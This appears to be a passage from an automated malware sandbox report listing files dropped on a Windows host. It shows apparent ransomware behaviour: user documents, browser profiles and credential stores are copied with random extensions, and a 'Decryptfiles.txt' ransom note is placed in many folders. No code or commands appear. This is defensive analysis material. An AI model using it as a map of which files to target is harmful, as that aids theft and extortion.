ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.jpg
|
Dyalog APL aplcore version -21.-102
|
dropped
|
||
C:\Users\user\Downloads\LHEPQPGEWF.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Downloads\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Downloads\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\downloaded.pdf
|
data
|
dropped
|
||
C:\Users\user\Favorites\Amazon.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Bing.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Facebook.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Favorites\Live.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\NYTimes.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Twitter.url
|
data
|
dropped
|
||
C:\Users\user\Favorites\Wikipedia.url
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Favorites\Youtube.url
|
data
|
dropped
|
||
C:\Users\user\Links\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Music\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT.PjJC
|
data
|
dropped
|
||
C:\Users\user\NTUSER.DAT.puvR
|
data
|
dropped
|
||
C:\Users\user\OneDrive\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Saved Games\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
|
data
|
dropped
|
||
C:\Users\user\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\_curlrc.QhjT
|
Dyalog APL version -3.87
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.qsaN
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.zFIM
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.yVIk
|
data
|
modified
|
||
C:\Users\user\ntuser.dat.LOG2.yrbT
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x26d1c33e, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms.BDVt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.xNOk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.HWrg (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.iPBU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.Mezk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.rAxY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.lQYq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.oCne (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.JDcj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.jmtu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.PdQk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.yGUV
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.fviB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b.BqDM
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.lPQT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.fmAg (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.dtbr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.JjBl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.gtXP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.qpCH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjtG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png.krjt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.yVvX
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.ONrF
(copy)
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg.WIXo (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png.oKLT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3.plQN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png.BRUx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx.VXkw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.wdfC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx.hAlF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg.eprR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx.XUBO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg.oygr (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3.gBKv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf.GOHi (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx.iHFZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3.dgJj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx.cbGq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx.eHcO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg.PcmU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx.TmlY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png.brqN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3.ObNa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg.OToE (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx.tPvz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx.VuIG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx.TYgz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg.HgaQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3.qtgv (copy)
|
byte-swapped Berkeley vfont data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx.qDQu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf.BOKH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.bpoX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png.caCH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png.KiBF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3.mXhC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.iSWK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx.bWXN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png.lpiM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg.ayzY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx.LzAp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.QjXA (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf.WqNa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png.Wkpw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx.VOgz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg.iEbY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3.DomY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf.eJLy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx.NJLe (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3.gWZR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.GuUT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.SUVD (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.jqFt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.apWv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.qZrs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.tiVb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jaxC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt.PFak (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json.IOon (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt.KBUz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4.DHML (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json.IABP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db.lDFx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini.Klgc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json.QTxO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite.NIxU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm.LVWf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite.faxb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4.SEKQ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4.rPjI
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4.LCHo
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4.xgqC
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4.pEyQ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4.ZKhS
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4.HkoK
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4.AJya
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin.sYuZ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update.IVvW
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events.VmMX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa.BZNT
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32.XnMa
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65.sEqP
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208.IVfa
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba.jsbL
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4.Ehqb
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c.chVM
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef.qHVn
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748.gPKv
(copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993.Lbdi
(copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76.KTkf
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7.Ohus
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7.lDGy
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a.iWVk
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855.Mikq
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0.nmQe
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4.nMDK
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5.QmZW
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16.zNJW
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d.efHJ
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066.JqUn
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json.gUXa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json.gSRq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json.WeZA (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json.bZyd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite.HCyL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db.fphL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite.pWQj (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt.lWUP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm.RDpm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite.MCJU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js.JDCT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite.gzih (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf.kuBI
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d.yagD
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d.zkga
(copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2.LvSr
(copy)
|
data
|
dropped
|
||
